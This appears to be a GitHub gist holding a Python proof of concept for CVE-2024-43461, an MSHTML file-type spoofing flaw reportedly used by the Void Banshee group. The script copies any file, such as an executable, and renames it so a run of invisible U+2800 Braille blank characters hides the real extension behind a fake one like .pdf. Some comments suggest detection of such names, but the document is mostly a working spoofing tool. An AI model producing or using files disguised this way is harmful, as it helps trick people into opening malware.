
@milo2012
Created September 16, 2024 09:52
CVE-2024-43461.py
import argparse
import os
import urllib.parse
# Reference: https://vulnera.com/newswire/void-banshee-apt-group-exploits-windows-mshtml-spoofing-vulnerability/?utm_source=rss&utm_medium=rss&utm_campaign=void-banshee-apt-group-exploits-windows-mshtml-spoofing-vulnerability
# Percent-encoded UTF-8 bytes (E2 A0 80) of U+2800, BRAILLE PATTERN BLANK.
# The glyph renders as empty space, so a run of it looks like padding in a
# file name. Defensive note: file names containing U+2800 are a simple,
# high-signal thing to flag in mail/web gateways and endpoint telemetry.
_ENCODED_BRAILLE_BLANK = "%E2%A0%80"
_PADDING_REPEATS = 26
BRAILLE_WHITESPACE = _ENCODED_BRAILLE_BLANK * _PADDING_REPEATS
def create_spoofed_file(input_file, output_base, fake_extension):
    """Copy *input_file* under a name whose real extension is padded out of view.

    The bytes are first written to ``<output_base>.<fake_extension>`` and that
    file is then renamed to
    ``<output_base>.<fake_extension><padding>.<original extension>``, where the
    padding is the decoded ``BRAILLE_WHITESPACE`` run.

    Review note (defensive): the real extension remains the last component of
    the resulting name, so checks that parse the complete file name, or that
    flag names containing U+2800, still see it.

    Args:
        input_file: Path of the file to copy; its extension becomes the
            trailing extension of the result.
        output_base: Output path without an extension.
        fake_extension: Extension placed directly after ``output_base``.
    """
    # Extension of the source file, without its leading dot.
    real_ext = os.path.splitext(input_file)[1].lstrip('.')

    # Read the source as raw bytes so the copy is exact.
    with open(input_file, 'rb') as src:
        data = src.read()

    # Stage the copy under the plain "<base>.<fake>" name first.
    staging_name = "{}.{}".format(output_base, fake_extension)
    with open(staging_name, 'wb') as dst:
        dst.write(data)

    # Decode the percent-encoded run into the actual U+2800 characters and
    # build the final name: staged name + padding + "." + real extension.
    padding = urllib.parse.unquote(BRAILLE_WHITESPACE)
    final_name = "{}{}.{}".format(staging_name, padding, real_ext)

    # Move the staged file to its final name.
    os.rename(staging_name, final_name)
    print(f"File has been created and renamed to {final_name}")
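def main():
    """Parse the command-line options and build the renamed copy.

    Options:
        -i/--input: input filename including its original extension.
        -o/--output: base output filename, expected without an extension.
        -f/--fake-extension: extension to show directly after the base name.

    If ``--output`` already carries an extension, the user is asked to
    confirm; on confirmation the extension is removed before the base name
    is passed on. Previously the warning promised stripping but the
    unmodified value was used, so the prompt and the result disagreed.
    """
    parser = argparse.ArgumentParser(description="Spoof file type by appending encoded Braille whitespace before the original extension.")
    parser.add_argument('-i', '--input', required=True, help="Input filename with original extension (e.g., 'test.exe')")
    parser.add_argument('-o', '--output', required=True, help="Base output filename (without extension)")
    parser.add_argument('-f', '--fake-extension', required=True, help="Fake file extension (e.g., 'pdf')")
    args = parser.parse_args()

    # Split once: the root is what gets used, the extension only triggers the
    # confirmation prompt. With no extension the root equals args.output.
    output_base, output_extension = os.path.splitext(args.output)
    if output_extension:
        print(f"Warning: The output filename '{args.output}' includes an extension, which will be stripped.")
        proceed = input("Do you want to proceed with stripping the extension? (y/n): ").strip().lower()
        if proceed != 'y':
            print("Operation canceled.")
            return

    create_spoofed_file(args.input, output_base, args.fake_extension)


if __name__ == '__main__':
    main()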